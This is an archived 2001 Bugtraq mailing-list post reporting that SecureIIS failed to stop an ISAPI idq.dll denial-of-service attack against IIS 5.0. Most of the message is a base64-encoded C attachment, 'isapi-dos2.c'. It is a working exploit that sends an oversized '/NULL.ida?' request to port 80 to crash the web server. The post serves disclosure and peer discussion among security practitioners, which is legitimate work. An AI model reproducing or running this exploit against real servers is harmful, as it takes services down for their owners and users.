[21214] in bugtraq
ISAPI and SECUREIIS
daemon@ATHENA.MIT.EDU (Crussaider)
Wed Jun 27 17:31:37 2001
Date: Wed, 27 Jun 2001 00:56:48 +0200
From: Crussaider <crussaider@globalnet.hr>
Reply-To: Crussaider <crussaider@globalnet.hr>
Message-ID: <69629346.20010627005648@globalnet.hr>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------90C52135B74B86"
------------90C52135B74B86
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Hi all,
after some testing I noticed that SecureIIS 1.0.6 does not
protect IIS 5.0 from ISAPI DoS attack. In the attachment is
isapi-dos2.c and isapi.exe cygwin compilation.
After attack with this exploit IIS is down. In SecureIIS i
have very restrictive polices, but anyway it did not manage to
protect it from this kind of attack.
To try isapi.exe you must have cygwin1.dll
Does anyone have similar experience?
--
Best regards,
Crussaider mailto:crussaider@globalnet.hr
------------90C52135B74B86
Content-Type: application/octet-stream; name="isapi-dos2.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="isapi-dos2.c"
Ly8gRG9TIGZvciBpc2FwaSBpZHEuZGxsIHVuY2hlY2tlZCBidWZmZXIuCi8vIEZvciBUZXN0aW5n
IFBydXBvc2VzCi8vIEJ5IFBzMCBEdE1GIGRvdCBjb20gZG90IGFyCgojaW5jbHVkZSA8c3RkaW8u
aD4KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4KI2luY2x1ZGUgPHN5cy90eXBlcy5oPgojaW5jbHVk
ZSA8bmV0aW5ldC9pbi5oPgojaW5jbHVkZSA8YXJwYS9pbmV0Lmg+CiNpbmNsdWRlIDxuZXRkYi5o
PgojaW5jbHVkZSA8ZXJybm8uaD4KCi8vICNkZWZpbmUgREVCVUcKCmludCBtYWluKGludCBhcmdj
LCBjaGFyICphcmd2W10pCnsKICAgY2hhciBtZW5zYWplWzgwMF07CiAgIGNoYXIgKmJvZjsKICAg
aW50IGZkOwogICBzdHJ1Y3Qgc29ja2FkZHJfaW4gc2luOwogICBzdHJ1Y3QgaG9zdGVudCAqcmhv
c3Q7CgogICBpZihhcmdjPDIpIHsKICAgICBmcHJpbnRmKHN0ZGVyciwiVXNlIDogJXMgaG9zdFxu
Iixhcmd2WzBdKTsKICAgICBleGl0KDApOwogICAgIH0KICAgCiAgIGJ6ZXJvKG1lbnNhamUsc3Ry
bGVuKG1lbnNhamUpKTsKICAgCiAgIGJvZj0oY2hhciAqKW1hbGxvYygyNDApOyAvLyAyNDAgc2Vn
dW4gZWV5ZSAsIHNpIHNlIGxlIGRhIG1hcyBOTyBhbmRhCiAgIAogICBtZW1zZXQoYm9mLCdBJywy
NDApOwogIAogICBzcHJpbnRmKG1lbnNhamUsIkdFVCAvTlVMTC5pZGE/JXM9WCBIVFRQLzEuMFxu
XG4iLGJvZik7CiAgIAogICAKI2lmZGVmIERFQlVHCiAgIHByaW50ZigiXG5NZW5zc2FnZSA6IFxu
JXNcbiIsbWVuc2FqZSk7CiNlbmRpZgogICAKICAgaWYgKChyaG9zdD1nZXRob3N0YnluYW1lKGFy
Z3ZbMV0pKT09TlVMTCl7CiAgICAgIHByaW50ZigiXG5DYW4ndCBmaW5kIHJlbW90ZSBob3N0ICVz
IFx0IEU6JWRcbiIsYXJndlsxXSxoX2Vycm5vKTsKICAgICAgcmV0dXJuIC0xOwogICB9CgogICBz
aW4uc2luX2ZhbWlseT1BRl9JTkVUOwogICBzaW4uc2luX3BvcnQ9aHRvbnMoODApOwoKICAgbWVt
Y3B5KCZzaW4uc2luX2FkZHIuc19hZGRyLCByaG9zdC0+aF9hZGRyLCByaG9zdC0+aF9sZW5ndGgp
OwoKICAgZmQgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSw2KTsKCiAgIGlmIChjb25uZWN0
KGZkLChzdHJ1Y3Qgc29ja2FkZHIgKikmc2luLCBzaXplb2Yoc3RydWN0IHNvY2thZGRyKSkhPTAp
ewogICAgICBwcmludGYoIlxuQ2FuJ3QgQ29ubmVjdCB0byBUaGUgaG9zdCAlcy4gTWF5IGJlIGRv
d24gPyBFOiVzXG4iLGFyZ3ZbMV0sc3RyZXJyb3IoZXJybm8pKTsKICAgICAgcmV0dXJuIC0xOwog
ICB9CiAgIAogICBwcmludGYoIlNlbmRpbmcgc3RyaW5nLi4uLi4uLi5cbiIpOwogICAKICAgaWYo
c2VuZChmZCxtZW5zYWplLHN0cmxlbihtZW5zYWplKSwwKT09LTEpewogICAgICBwcmludGYoIlxu
RXJyb3IgXG4iKTsKICAgICAgcmV0dXJuIC0xOwogICB9CiAgIAogICBwcmludGYoIlxuU3RyaW5n
IFNlbnQuLi4gdHJ5IHRlbG5ldCBob3N0IDgwIHRvIGNoZWNrIGlmIElJUyBpcyBkb3duXG4iKTsK
ICAgCiAgIGNsb3NlKGZkKTsKICAgCiAgIHJldHVybiAwOwogCn0KICAgCg==
------------90C52135B74B86--
